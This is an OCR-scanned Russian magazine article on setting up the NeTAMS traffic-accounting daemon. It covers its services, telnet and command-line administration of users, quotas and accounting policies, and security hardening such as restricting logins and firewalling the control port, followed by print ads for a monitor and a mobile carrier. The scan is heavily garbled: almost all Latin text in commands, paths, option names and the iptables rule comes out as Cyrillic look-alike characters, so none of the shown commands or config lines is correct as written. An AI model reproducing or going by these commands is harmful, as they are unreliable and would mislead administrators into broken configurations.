представляет собой демон и имеет в своем арсенале несколько сервисов, 
каждый из которых выполняет определенную задачу. Все сервисы 
работают в отдельных потоках, а их свойства описываются в конфигура- 
ционном файле. 

1 . Сервис таіп в конфиге не указан, поскольку представляет собой глав- 
ный поток, с исполнения которого начинает программа. Он определяет 
основные свойства всего процесса, считывает и разбирает конфигураци- 
онный файл, запуская другие сервисы, и останавливается до завершения 
работы пеіагпз. При подаче команд кШ, бЬшхіоѵѵп, геіоаб, возникновении 
критического сбоя или получении сигнала 5ІССЗІЛТ, сервис таіп про- 
сыпается и пытается остановить все другие сервисы, чтобы корректно 
закрыть базу данных и убрать перехватчики пакетов. 

2. Сервис ргосеззог является ядром пеіатз. Именно в нем определяются 
правила учета и список объектов, по которым будет произведен учет. Во- 
обще, все компоненты системы обмениваются между собой сообщения- 
ми, например запросами к БД или данными о трафике за некий интервал 
времени. Ргосеззог обеспечивает диспетчеризацию всех сообщений. 
Всего возможен только один ргосеззог на экземпляр программы. 

3. Сервис зегѵег позволяет присоединяться к работающей программе 
через ТСР-сокет; с помощью различных команд можно управлять про- 
граммой и снимать статистику. 

4. Сервис сіат-зоигсе обеспечивает поступление данных о трафике 
внутрь программы. В настоящее время может обрабатываться только 
информация об ІР-трафике. В качестве источников данных об ІР-тра- 
фике могут выступать средства перехвата пакетов систем ЕгееВЗП (Ьбй- 
біѵегі:), Ілпих (ір_диеие), средства прослушивания сетевого интерфейса 
(НЬрсар/ЬрО, а также статистика Иеі:РІоѵ\/, приходящая от маршрутиза- 
торов Сізсо. Кстати, есть возможность сбора статистики, например, о 
работе почтовой системы или ргоху-сервера. 

5. Сервис БШга^е определяет БД для хранения статистики. Это может 
быть стандартный ЮТХЬазЬ, который есть в любой системе, или база 
данных ЗС^Ь, расположенная на локальной или соседней машине. 
Статистика существует в двух форматах: гаѵѵ или зшптагу (в одной базе 
можно держать один из форматов или оба сразу) . 

6. Сервис аіегіег позволяет администратору организовывать отправку 
себе или пользователям отчета о прошедшем и учтенном трафике, о 
деятельности системы и прочем. 

7. Сервис зсЬебиІег обеспечивает выполнение заданных команд в 
запланированное время. Это «виртуальный» сервис, так как запускается 
всегда автоматически и не требует конфигурирования. Здесь важны 
только запланированные команды, список которых выводится в конфи- 
гурационном файле после перечисления пользователей. 

8. Сервис Ішпі отвечает за автоматическое создание статических Ьйпі- 
страниц, содержащих информацию о прошедшем трафике, о работе 
системы и прочем за определенный период времени. Эти страницы (при 
соответствующей конфигурации ѵѵеЪ-сервера) впоследствии могут быть 



просмотрены клиентом без отвлечения программы от работы. 

9. Сервис топйог организует мониторинг заданных юнитов для сбора 
информации по относящемуся к ним трафику. 

Попробуй набрать команду бііоѵѵ сопіі§, а затем — Ішпі. Первая покажет 
конфиг, который загружен в память, а вторая создаст ІПтІ-файлы в 
каталоге /изг/іосаі/ѵуллл/ѵ/зті:; в них будет отображена вся статистика на 
текущий момент. 

Если ты правишь конфиг непосредственно из файла, обязательно пере- 
запускай демон. Для правки конфига нужно учесть два правила: 

1 . Все сервисы, описанные в конфиге, должны отделяться друг от друга 
пустой строкой. Это позволит программе увидеть завершение описания 
одного сервиса и начало описания другого. 

2. При добавлении нового пользователя категорически запрещается 
вручную вносить его запись в конфиг. Это можно сделать с помощью 
сервиса ргосеББОГ, который автоматически назначит пользователю иден- 
тификатор и добавит необходимые записи в базу данных. 

НАСТРОЙКА НТМІ.-ИНТЕРФЕЙСА 

Иеі:ат5 автоматически создает ІШпІ-страницы, с помощью которых мож- 
но как администрировать, так и смотреть статистику. Период генериро- 
вания страниц, путь до каталога и некоторые другие настройки можно 
изменить в конфигурационном файле, в секции Зегѵісе Ішпі. Естествен- 
но, для того чтобы обращаться к страницам из браузера, нужно иметь 
настроенный и запущенный ѵѵеЪ-сервер. В случае АрасЬе в пегатз.с^ для 
сервиса Ыт\ следует прописать строчку «ра гіі /изг/ІосаІ/арасйе/Мосз». 
Немного забегая вперед, скажу, что рядом с бинарником, стартующим 
демон, расположен файл ІіеіатБСІІ, который представляет собой эмуля- 
тор іеіпек Он может выполнять абсолютно все функции, которые будут 
переданы в командной строке. Так, например, чтобы с помощью обыч- 
ной іеіпеі-сессии установить 100 Мб жесткой квоты входящего трафика 
пользователю Риркіп, нужно выполнить следующие операции: 

$ кеіпек Іосаікозк 20001 
>1одіп : 

>раэвѵгогсІ: 

>зегѵісе диока 0 

>зек паше Риркіп топкЬ 10 ОМ іп 

>ехік 

То же самое можно проделать с помощью одной-единственной команды, 
не подключаясь к іеіпеі’у: 

# /изг/1оса1/зЪіп/пекатзск1 "зегѵісе диока 0 && зек 
пате Риркіп топкк 100М іп && ехік" 

Самое приятное во всем этом, что такие параметры можно передавать 
абсолютно из любого места. В том числе и из ССІ-скриптов. К нашему 
счастью, разработчики пакета постарались и написали набор скриптов для 
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работы с разными сервисами. Найти его можно в дистрибутиве ИеТАМЗ, в 
каталоге ./с§і-Ьіп. Если положить все файлы из этого каталога в папку с§і- 
Ьіп на сервере и набрать в адресной строке браузера «Ьпр : //1осаШозі:/с§і- 
Ьіп/асітіпі;оо1.с§і», нас незамедлительно перекинет в админку. 

ДОБАВЛЯЕМ ПОЛЬЗОВАТЕЛЯ 

Для того чтобы добавить нового пользователя или группу, подключаемся 
кіеІпеЕу, вводим имя пользователя, пароль и пишем «зегѵісе ргосеззог». 
После этого можно добавлять пользователя: 

>ипік изег пате Риркіп ір 192.168.0.10 етаіі РиркіпО 
сіотаіп . ги 

рагепк СЫЕЫТ 8 асск-роіісу ір ѵття таіі 
>ехік 
>заѵе 

Затем вводим зіюѵѵ сопіі§ и смотрим, чтобы пользователю присвоил ся 
ОГО и, самое главное, чтобы строка «ассі-роіісу ір мѵмѵмѵ таіі» была полно- 
стью и без ошибок, иначе ничего работать не будет. 

Все, после этого можно установить пользовательскую квоту: 

>зегѵісе диока 0 

>зек паше Риркіп топкЬ. 10 ОМ іп 

>ехік 

ПОЛИТИКИ УЧЕТА 

Для того чтобы программа считала поступающий трафик, ей нужно 
знать, что он собой представляет и как выглядит. В конфигурационном 
файле можно встретить примерно такие строки: 

роіісу оісі 01В148 паше ір кагдек ргоко ір 

роіісу оісі 010А1Е паше кагдек ргоко кср рогк 80 81 

8080 3128 

роіісу оісі 091С21 паше таіі кагдек ргоко кср рогк 25 110 

После слова пате указывается имя политики. Этот параметр можно 
изменять по своему усмотрению. А вот параметр іаг^еі: описывает про- 
тотип правила, по которому будет вестись учет. Протоколы могут иметь 
следующие значения: 

ір — весь ІР-трафик; 
істр — ІСМР-трафик; 
кср — ТСР-трафик; 
исір — ШР-трафик. 

Политика добавляется в сервисе ргосеззог в формате: 

роіісу [оісі ОІБ] пате МАМЕ 
[по] кагдек ТАКСЕТ 
[Ъъг { зреесі іп зреесі оик I зреесі } ] 



В боевых условиях это будет выглядеть так: 

>зегѵісе ргосеззог 
>ро 1 ісу пате ір кагдек ргоко ір 
>ро 1 ісу пате кср кагдек ргоко кср 
>ро 1 ісу пате исір кагдек ргоко исір 
>ро 1 ісу пате кгазк кагдек ргоко ір 

Таким образом, при грамотном использовании политик можно достаточ- 
но четко разграничить учет трафика. При создании нового юнита важно 
не забывать добавлять в конец строки нужные политики. Еще один мо- 
мент: пока пакеты будут считаться по политике ір, тебе не удастся в явном 
виде скалькулировать весь ЕГОР- и ТСР-трафик. Чтобы при совпадении 
политики дальнейший подсчет прекратился, нужно использовать знак%. 

>ипік кюзк пате Риркіп ір 192.168.0.10 асск-роіісу ір 
%кср %исір кгазк 

БЕЗОПАСНОСТЬ 

Поскольку пеіатз запускается с правами гооі и отвечает за подсчет 
небесплатного трафика, защите всей системы следует уделить самое 
пристальное внимание. Существует несколько потенциально небезопас- 
ных направлений: 

1. Взлом защиты самой программы. 

2. Взлом операционной системы через программу. 

3. Действия, приводящие к неверному учету трафика. 

По достоверным сведениям, на сегодняшний день ни одного случая 
взлома программы зарегистрировано не было. 

Несанкционированный доступ к программе возможен путем раскрытия 
пароля и присоединения к программе через іеіпек Это особенно актуаль- 
но при использовании генератора статистики НТМЬ. Для уменьшения 
риска нужно сделать следующее: 

1. Установить права на чтение конфигурационного файла и лог-файлов 
только для пользователя гоок 

2 . Установить жесткие права на чтение локальных файлов НТМЬ-статистики. 

3. Средствами Ьир-сервера установить права на просмотр статистики 
«извне» только тем, кому нужно. 

4. Разрешить возможность логина в программу только с локальной 
машины: 

зегѵісе зегѵег 0 
іодіп ІосаПюзк 

5 . Отрезать правилами ІріаЫез или любого другого файрвола твоей 
системы нелокальное подключение к программе: 

# іркаЫез -А РКЕКОІІГШС -і еккО -р кср --сірогк 2 00 01 - 3 ' 
БКОР -к пак 

ПОДВОДИМ ИТОГИ 

В принципе, все, что нужно знать для начала работы с пакетом ИеТАМЗ, 
я рассказал, но, разбираясь во всех тонкостях настройки и добиваясь 
стабильного и безошибочного функционирования программы, ты не раз 
еще будешь вдумчиво курить мануалы и шерстить форум. От себя могу 
добавить, что пользуюсь ИеТАМЗ’ом уже более двух лет и вполне доволен 
всеми его возможностями. Но выбор, как всегда, за тобой, ц-ц 



► ібо 
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Высокий уровень контрастности достигается за счет 
новейшей технологии Оіді1:аІ Ріпе Сопігазі: 





2000:1 

Оідііаі 

Ріпе 

СопІгазІ 



Во Власти Качества 

Высокий контраст 

ЖК - монитор ІС РІ_АТРЮЫ ІЛ960ТС! 

іпаѴІсІогіа 

(495) 681-20-70, ѵѵѵѵѵѵ.сіѵсотр.ги 




МОСКВА: Ргопеі бгоир (495) 789-38-46, Неоторг (495) 223-23-23, розничная сеть Роіагіз (495) 363-93-33, Ф-Центр (495) 472-64-01, 
ІЯТ СотрЫегз (495) 363-93-33, Техносила (495) 777-87-77, Компания Кит (495 ) 777-66-55, РІаке (495) 236-99-25, АБ-групп (495) 745-51-75, 
Сетевая Лаборатория (495) 784-64-90, І5М (495) 718-40-20, Никс (495) 974-33-33, ОЛДИ (495) 105-07-00, Ц5Ы СотрЫегз (495) 221-72-97, 
Старт-Мастер (495) 935-38-52, Акситек (495) 784-72-24, Эльдорадо (495) 500-00-00, Кибертроника (495) 504-25-31, 
Дилайн (495) 969-22-22, Шга СотріДегз (495) 775-75-66, Алмер (495) 101-39-25, Микросет (495) 924-27-47, Гипермаркет Санрайз Про 
(495) 542-80-70, ДЕЛ (495) 250-44-66, Ланит (495) 967-66-84, 000 Вега (495) 784-72-35, ГЕЛИОС КОМПЬЮТЕР 

(495) 785-03-76, Бит и Байт (495) 788-37-57. САНКТ-ПЕТЕРБУРГ: ДВМ-Нева (812) 325-11-05. НИЖНЕВАРТОВСК: Ланкорд (3466) 61-22-22. 
ПЕРМЬ: Гаском (342) 237-19-33. НИЖНИЙ НОВГОРОД: АйТиОн (8312) 63-01-53. ТЮМЕНЬ: Инэкс-Техника (3452) 39-00-36, Торговый дом 
"Весы" (3452) 75-00-00. КРАСНОДАР: Иманго-Краснодар (861) 255-15-52. НОВОСИБИРСК: Квеста (383) 333-24-07, 

Арсиситек (383) 221-16-89, НЭТА (383) 218-22-18. БАРНАУЛ: Компьютер Трейд (3852) 66-69-00. ЭЛЕКТРОСТАЛЬ: 

Домотехника (257) 21488. ИРКУТСК: Комтек (3952) 25-83-38, Билайн (3952) 24-00-24. КРАСНОЯРСК: Альдо (3912) 21-11-45, Старком 
(3912) 62-33-99, Аверс (3912) 56-05-61. ЛИПЕЦК: Регард Тур (0742 ) 48-45-73. ВОРОНЕЖ: Сани (0732) 54-00-00, Рет (0732) 77-93-39. 
ТОМСК: Стек (3822) 55-71-43. РЯЗАНЬ: ДВК (0912) 90-00-00. ЯРОСЛАВЛЬ: Фронтекс (4852) 72-38-49. ОМСК: Технопарк (3812) 57-93-19, 
Лик-2000 (3812) 22-97-00. АЛЬМЕТЬЕВСК: Компьютерный мир (8553) 25-98-48. ВОРОНЕЖ: РИАН (4732) 51-24-12. 

ЛАБЫТНАНГИ: КЦ Ямал (34992 ) 51-777. ИЖЕВСК: ЭЛМИ (3412) 50-50-50, Корпорация «Центр» (3412) 43 88 08. 

СЫЗРАНЬ: ООО "фирма Такт" (8464) 98-34-34. ЕКАТЕРЕНБУРГ: Трилайн (343) 378-70-70. БЛАГОВЕЩЕНСК: А-Эл-Джи Софт 
(4162) 31-70-14. КИРОВ: Портал (8332) 38-20-60. ТАГАНРОГ: Иманго (8634) 315-628. ГОМЕЛЬ: Компьютер Маркет +375 (232) 48-10-48. 



реклама 




Определи свою 
географию общения! 



Зачем тебе остальной мир, если ты туда не звонишь? 

Тебе еще не надоело расплачиваться за весь мир? Общайся с теми, кто тебе действительно дорог! 
Специально для тебя МегаФон предлагает услугу «География общения». Выбери тарифную опцию 
«Регион России» или «Страна мира» и звони своим друзьям и близким со скидкой. 



Выбери себе красивый номер или лучший тариф в Интернет-магазине 
Нйр://5Иор.те§аГоп.ги 




Гран-При 
БРЭНД ГОДА/ЕРГІЕ 2006 



Лицензии №№ юою, 13282, 14404, 15002, 15409, 15410, 15411, 15412, 16338, 20377 Министерства РФ по связи и информатизации. 
Подробности - в офисах продаж и обслуживания и на сайте ѵтѵѵ.тедайзп.ги На правах рекламы. 



звонки по России на этот номер - бесплатно 

8 800 333 0500 



ф 



Мегафон 

Будущее зависит от тебя 






